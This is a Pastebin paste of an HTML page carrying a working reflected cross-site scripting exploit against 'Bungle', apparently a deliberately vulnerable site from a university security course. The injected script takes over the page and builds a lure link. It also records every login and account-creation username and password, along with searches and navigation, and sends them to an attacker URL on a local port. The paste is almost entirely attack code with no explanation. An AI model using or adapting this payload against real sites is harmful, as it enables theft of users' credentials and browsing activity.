API tools faq
paste
Advertisement
Guest User

MAX

a guest
Nov 16th, 2017
99
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.17 KB | None | 0 0
raw download clone embed print report
  1. <meta charset="utf-8">
  2. <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
  3. <script>
  4. function payload(attacker) {
  5. function spyGet(spy_url){
  6. $.ajax({
  7. url: spy_url,
  8. type: "GET",
  9. timeout: 1
  10. });
  11. }
  12. function getUser(){
  13. var username;
  14. if($("#logged-in-user").length != 0){
  15. username = $("#logged-in-user").innerText;
  16. }
  17. else{
  18. username = null;
  19. }
  20. return username;
  21. }
  22. function logSearch(data) {
  23. var username = getUser();
  24. var get_url = attacker + "?event=nav";
  25. if(username != null){
  26. get_url = get_url + "&user=" + username;
  27. }
  28. get_url = get_url + "&url=http://trurl.cs.illinois.edu/" + data.substr(2);
  29. spyGet(get_url);
  30. }
  31. function logLogout(data){
  32. var logout_url = attacker + "?event=logout&user=" + getUser();
  33. var get_url = attacker + "?event=nav&url=http://trurl.cs.illinois.edu/";
  34. spyGet(logout_url);
  35. spyGet(get_url);
  36. }
  37. function logLogin(username, password){
  38. var login_url = attacker + "?event=login&user=" + username + "&pass=" + password;
  39. var get_url = attacker + "?event=nav&user=" + username + "&url=http://trurl.cs.illinois.edu/";
  40. spyGet(login_url);
  41. spyGet(get_url);
  42. }
  43. function logCreateAccount(username, password){
  44. var login_url = attacker + "?event=login&user=" + username + "&pass=" + password;
  45. var get_url = attacker + "?event=nav&user=" + username + "&url=http://trurl.cs.illinois.edu/";
  46. spyGet(login_url);
  47. spyGet(get_url);
  48. }
  49. function logHome(data){
  50. var username = getUser();
  51. var get_url = attacker + "?event=nav";
  52. if(username != null){
  53. get_url = get_url + "&user=" + username;
  54. }
  55. get_url = get_url + "&url=http://trurl.cs.illinois.edu/";
  56. spyGet(get_url);
  57. }
  58. function logHistory(data){
  59. var username = getUser();
  60. var get_url = attacker + "?event=nav";
  61. if(username != null){
  62. get_url = get_url + "&user=" + username;
  63. }
  64. get_url = get_url + "&url=http://trurl.cs.illinois.edu/" + data.substr(2);
  65. spyGet(get_url);
  66. }
  67. function proxy(href) {
  68. $("html").load(href, function(){
  69. $("html").show();
  70. $("#query").val("pwned!");
  71. $("#bungle-lnk, #search-again-btn").click(function(e) {
  72. e.preventDefault();
  73. logHome("./");
  74. proxy("./");
  75. });
  76. $("#search-btn").click(function(e) {
  77. e.preventDefault();
  78. var search = $("#query").val();
  79. logSearch("./search?q=" + search);
  80. proxy("./search?q=" + search);
  81. });
  82. $(".history-item").click(function(e) {
  83. var url = $(this).attr("href");
  84. e.preventDefault();
  85. logHistory(url);
  86. proxy(url);
  87. });
  88. $("#log-in-btn").click(function(e) {
  89. e.preventDefault();
  90. var username = $("#username").val();
  91. var userpass = $("#userpass").val();
  92. logLogin(username, userpass);
  93. $.ajax({
  94. type: "POST",
  95. url: "http://trurl.cs.illinois.edu/login",
  96. dataType: "text",
  97. data: {
  98. username: username,
  99. password: userpass
  100. },
  101. success: function(){
  102. proxy("./");
  103. }
  104. });
  105. });
  106.  
  107. $("#new-account-btn").click(function(e) {
  108. e.preventDefault();
  109. var username = $("#username").val();
  110. var userpass = $("#userpass").val();
  111. logCreateAccount(username, userpass);
  112. $.ajax({
  113. type: "POST",
  114. url: "http://trurl.cs.illinois.edu/create",
  115. dataType: "text",
  116. data: {
  117. username: username,
  118. password: userpass
  119. },
  120. success: function(){
  121. $.ajax({
  122. type: "POST",
  123. url: "http://trurl.cs.illinois.edu/login",
  124. dataType: "text",
  125. data: {
  126. username: username,
  127. password: userpass
  128. },
  129. success: function(){
  130. proxy("./");
  131. }
  132. });
  133. }
  134. });
  135. });
  136.  
  137. $("#log-out-btn").click(function(e) {
  138. e.preventDefault();
  139. logLogout("./");
  140. $.ajax({
  141. type: "POST",
  142. url: "http://trurl.cs.illinois.edu/logout",
  143. success: function(){
  144. proxy("./");
  145. }
  146. });
  147. });
  148. });
  149. }
  150. $("html").hide();
  151. proxy("./");
  152. }
  153.  
  154. function makeLink(xssdefense, target, attacker) {
  155. if (xssdefense == 0) {
  156. return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<script" + ">" + payload.toString() + ";payload(\"" + attacker + "\");<" + "/script>");
  157. }
  158. }
  159.  
  160. var xssdefense = 0;
  161. var target = "http://trurl.cs.illinois.edu/";
  162. var attacker = "http://127.0.0.1:31337/stolen";
  163.  
  164. $(function() {
  165. var url = makeLink(xssdefense, target, attacker);
  166. $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
  167. });
  168. </script>
  169.  
  170. <h3></h3>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!